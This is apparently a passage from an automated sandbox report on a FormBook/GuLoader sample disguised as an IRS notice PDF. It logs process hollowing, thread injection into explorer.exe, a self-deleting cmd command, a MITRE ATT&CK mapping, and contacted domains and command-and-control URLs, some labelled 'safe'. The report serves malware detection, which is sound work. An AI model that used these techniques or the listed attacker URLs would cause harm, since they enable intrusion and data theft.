      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E254120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E254120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E239100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E239100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E239100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2661A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2661A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2B51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2C41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056817D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568161 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568119 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005681DD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005681F4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005681E9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568198 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005681A9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568250 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056825E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568271 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568211 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568205 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00568296 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_0056741C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_005666D1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563EE3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563F15 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563F0C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_00563F21 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05028D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05003D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F7746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FEC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FEC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050205AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050205AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F8A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F8BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05008DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0502740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0502740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0502740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04FD6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F81DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F81DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F81DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F835A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F8FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F8FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F82581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F82581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F82581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F82581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F52D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F52D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F52D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F52D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 153.126.209.136 80
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.209.95 80
      Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeNetwork Connect: 216.58.207.179 80
      Source: C:\Windows\explorer.exeNetwork Connect: 147.255.30.94 80
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeThread register set: target process: 3424
      Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3424
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: CA0000
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeProcess created: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
      Source: explorer.exe, 00000002.00000000.716705067.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
      Source: explorer.exe, 00000002.00000002.1021557807.0000000001080000.00000002.00000001.sdmp, cmstp.exe, 00000003.00000002.1021656709.00000000037E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000002.1021557807.0000000001080000.00000002.00000001.sdmp, cmstp.exe, 00000003.00000002.1021656709.00000000037E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000002.1021557807.0000000001080000.00000002.00000001.sdmp, cmstp.exe, 00000003.00000002.1021656709.00000000037E0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000002.1021557807.0000000001080000.00000002.00000001.sdmp, cmstp.exe, 00000003.00000002.1021656709.00000000037E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000002.00000000.734930880.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3879 cpuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: cmstp.exe PID: 2860, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: IRS Notice Letter pdf document.exe PID: 3788, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion22OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery311VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 338078 Sample: IRS Notice Letter pdf docum... Startdate: 11/01/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Yara detected GuLoader 2->40 42 11 other signatures 2->42 10 IRS Notice Letter pdf document.exe 1 2->10         started        process3 signatures4 52 Tries to detect Any.run 10->52 54 Hides threads from debuggers 10->54 13 IRS Notice Letter pdf document.exe 6 10->13         started        process5 dnsIp6 34 adojetson.com 198.187.29.67, 49730, 80 NAMECHEAP-NETUS United States 13->34 56 Modifies the context of a thread in another process (thread injection) 13->56 58 Tries to detect Any.run 13->58 60 Maps a DLL or memory area into another process 13->60 62 3 other signatures 13->62 17 explorer.exe 13->17 injected signatures7 process8 dnsIp9 28 aizimov.com 153.126.209.136, 49738, 80 SAKURA-ASAKURAInternetIncJP Japan 17->28 30 www.aksaystudios.com 147.255.30.94, 49737, 80 LEASEWEB-USA-LAX-11US United States 17->30 32 18 other IPs or domains 17->32 44 System process connects to network (likely due to code injection or exploit) 17->44 21 cmstp.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.thebuzztraders.com/09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS0%Avira URL Cloudsafe
      http://www.kobumsnetwork.com/09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.rednbot.com/09rb/?Jt78=GzMG1eSemGLMBHrXmbkE5oZCgXo7nbeyHhmTYulGjAFIODDsopduu5ndU/Um1KPjDO6l&pN9=EXX8_N6xKpqxS0%Avira URL Cloudsafe
      http://adojetson.com/vc/xdark_GOaIsqF182.bin0%Avira URL Cloudsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.emuprising.com/09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS0%Avira URL Cloudsafe
      http://www.alessandrabortolussi.net/09rb/?Jt78=kPRwpjmi7xHhdB/QktvvK7WyLyDr49juN0w/BSnfKghxj4qCtVdYSmPoUBccxdfkW2C+&pN9=EXX8_N6xKpqxS0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.myaarpdentalpln.com/09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS0%Avira URL Cloudsafe
      http://www.aizimov.com/09rb/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS0%Avira URL Cloudsafe
      http://www.aksaystudios.com/09rb/?Jt78=fd7Pr27tD73tirRUHLPhwKiuhRBsBtIJKGnPU16/EYze1BREDS5LbMsrasNXGEl7bB1Y&pN9=EXX8_N6xKpqxS0%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      aizimov.com
      		153.126.209.136
      		truetrue
        		unknown
        alessandrabortolussi.net
        		34.102.136.180
        		truetrue
          		unknown
          adojetson.com
          		198.187.29.67
          		truefalse
            		unknown
            emuprising.com
            		34.102.136.180
            		truetrue
              		unknown
              www.aksaystudios.com
              		147.255.30.94
              		truetrue
                		unknown
                ghs.googlehosted.com
                		216.58.207.179
                		truetrue
                  		unknown
                  www.kobumsnetwork.com
                  		172.67.209.95
                  		truetrue
                    		unknown
                    rednbot.com
                    		34.102.136.180
                    		truetrue
                      		unknown
                      www.myaarpdentalpln.com
